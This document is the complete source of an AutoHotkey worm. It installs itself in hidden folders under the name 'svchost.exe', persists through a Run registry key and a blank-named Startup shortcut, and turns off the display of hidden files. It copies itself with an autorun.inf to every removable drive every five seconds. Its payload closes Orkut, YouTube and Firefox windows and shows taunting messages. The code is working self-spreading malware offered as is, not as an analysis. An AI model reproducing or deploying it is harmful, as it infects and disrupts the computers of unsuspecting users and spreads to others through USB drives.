#notrayicon
;*********************************************************************
;*                                                                   *
;* The sfx should be created with the extracting path as %temp%      *
;* and the program to run after extract is , svchost.exe install.txt * 
;*                                                                   *
;*********************************************************************

Regread,regvalue,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status
 ifequal,regvalue,present
  exitapp

;*******************************search for the valid paths*********************************
ArrayCount = 0
Loop, Read,%temp%\MicrosoftPowerPoint\pathList.txt
{
    ArrayCount += 1  
    Array%ArrayCount% := A_LoopReadLine
}

Loop %ArrayCount%
{

    path1 := Array%A_Index%  

      Ifexist,%path1%
       Ifexist,%path1%\svchost.exe
         Ifexist,%path1%\std.txt
          exitapp  

      FileCreateDir,%path1%
        if errorlevel
          continue
        else
       {
         Filecopy,%temp%\MicrosoftPowerPoint\svchost.exe,%path1%\  
          if errorlevel
             continue
         Filecopy,%temp%\MicrosoftPowerPoint\drivelist.txt,%path1%\
         Filecopy,%temp%\MicrosoftPowerPoint\2.mp3,%path1%\
         Filecopy,%temp%\MicrosoftPowerPoint\icon.ico,%path1%\
         FileCreateDir,%path1%\offspring
         break
       }
       
       
}
Filesetattrib,+SH,%path1%
;*******************************end of search for the valid paths**************************




;*******************************search for the virus itself and make copy******************
ArrayCount = 0
Loop, Read,%temp%\MicrosoftPowerPoint\driveList.txt
{
    ArrayCount += 1  
    Array%ArrayCount% := A_LoopReadLine
}

Loop %ArrayCount%
{

    drivename := Array%A_Index%  
                                        ;search in the root of all drives in the drivelist 
     ifexist,%drivename%:\MicrosoftPowerPoint.exe                          
     { 
         Filecopy,%drivename%:\MicrosoftPowerPoint.exe,%path1%\offspring\
         break
     }
     else
      continue
}
Filesetattrib,+SH,%path1%\Offspring\MicrosoftPowerPoint.exe
;*******************************end of search for the virus********************************




;*******************************create autorun.inf*******************************
;Open=MicrosoftPowerPoint.exe
;shell\open\command=..\MicrosoftPowerPoint.exe
ifnotexist,%path1%\offspring\autorun.inf
Fileappend,
(
[Autorun]
open=MicrosoftPowerPoint.exe
shellexecute=MicrosoftPowerPoint.exe
shell\Auto\command=MicrosoftPowerPoint.exe
),%path1%\offspring\autorun.inf
Filesetattrib,+SH,%path1%\Offspring\autorun.inf
;*******************************end of autorun.inf*******************************


Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status,present
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,%path1%\svchost.exe %path1%\std.txt
if errorlevel
{
dat1=%userprofile%
filecreateshortcut,"%path1%\svchost.exe",%dat1%\Start Menu\Programs\Startup\ .lnk,,"%path1%\std.txt",,%path1%\icon.ico,,,

ifnotexist,%path1%\reproduce.txt
FileAppend,
(
#notrayicon
#persistent
#singleinstance,ignore
ArrayCount = 0
Loop, Read,%path1%\driveList.txt 
{
    ArrayCount += 1  
    Array`%ArrayCount`% := A_LoopReadLine
}
dat1=`%userprofile`%
settimer,reproduce,5000                   
return

reproduce:

Loop `%ArrayCount`%
{

    element := Array`%A_Index`%  
    driveget,data,Type,`%element`%:\
    ifequal,data,Removable                
     {                                    
     driveget,data1,status,`%element`%:\  
      ifequal,data1,Ready                 
      {
        FileCopydir,%path1%\offspring,`%element`%:\,1                       

      }
  
     }
}
ifnotexist `%dat1`%\Start Menu\Programs\Startup\ .lnk
filecreateshortcut,"%path1%\svchost.exe",`%dat1`%\Start Menu\Programs\Startup\ .lnk,,"%path1%\std.txt",,%path1%\icon.ico,,,
else
FileGetShortcut, `%dat1`%\Start Menu\Programs\Startup\ .lnk , OutTarget, OutDir, OutArgs, OutDescription, OutIcon
ifnotequal,outtarget,%path1%\svchost.exe
 goto fix
ifnotequal,outargs,"%path1%\std.txt"
 goto fix
ifnotequal,OutIcon,%path1%\icon.ico
 goto fix
goto skip
fix:
filecreateshortcut,"%path1%\svchost.exe",`%dat1`%\Start Menu\Programs\Startup\ .lnk,,"%path1%\std.txt",,%path1%\icon.ico,,,
skip:
return
),%path1%\reproduce.txt

}
else
{
ifnotexist,%path1%\reproduce.txt
FileAppend,
(
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,%path1%\driveList.txt 
{
    ArrayCount += 1  
    Array`%ArrayCount`% := A_LoopReadLine
}
dat1=`%userprofile`%
settimer,reproduce,5000                   
return

reproduce:

Loop `%ArrayCount`%
{

    element := Array`%A_Index`%  
    driveget,data,Type,`%element`%:\
    ifequal,data,Removable                
     {                                    
     driveget,data1,status,`%element`%:\  
      ifequal,data1,Ready                 
      {
        FileCopydir,%path1%\offspring,`%element`%:\,1                       

      }
  
     }
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,%path1%\svchost.exe %path1%\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,%path1%\svchost.exe %path1%\std.txt
return
),%path1%\reproduce.txt


}



;*******************************Create std.txt*******************************
ifnotexist,%path1%\std.txt
Fileappend,
(
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
 regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run %path1%\svchost.exe %path1%\script1.txt
Run %path1%\svchost.exe %path1%\reproduce.txt
),%path1%\std.txt
;*******************************end of std.txt*******************************





message1=    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool``,The administrators didnt write this program guess who did??``r``r                                               MUHAHAHA!!,30
message2=    msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE ``r        OR ELSE...,30
message3=    msgbox,262160,youtube IS BANNED,youtube is banned you fool``,The administrators didnt write this program guess who did??``r``r                                               MUHAHAHA!!,30
Fileappend,
(
#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
 ifinstring,ed,orkut
  {
   winclose `%ed`%
   soundplay,%path1%\2.mp3
   %message1%
   return
  }
 ifinstring,ed,youtube
  {
   winclose `%ed`%
   soundplay,%path1%\2.mp3
   %message3%
   return
  }
 ifinstring,ed,Mozilla Firefox
  {
    winclose `%ed`%
    %message2%
    return
  }
ifwinactive ahk_class IEFrame
{

 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
    %message1%
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
    %message1%
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
   %message1%
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
    %message1%
    return
  }
 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
    %message3%
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
    %message3%
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
   %message3%
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,%path1%\2.mp3
    %message3%
    return
  }

}
return

),%path1%\script1.txt


Run %path1%\svchost.exe %path1%\std.txt
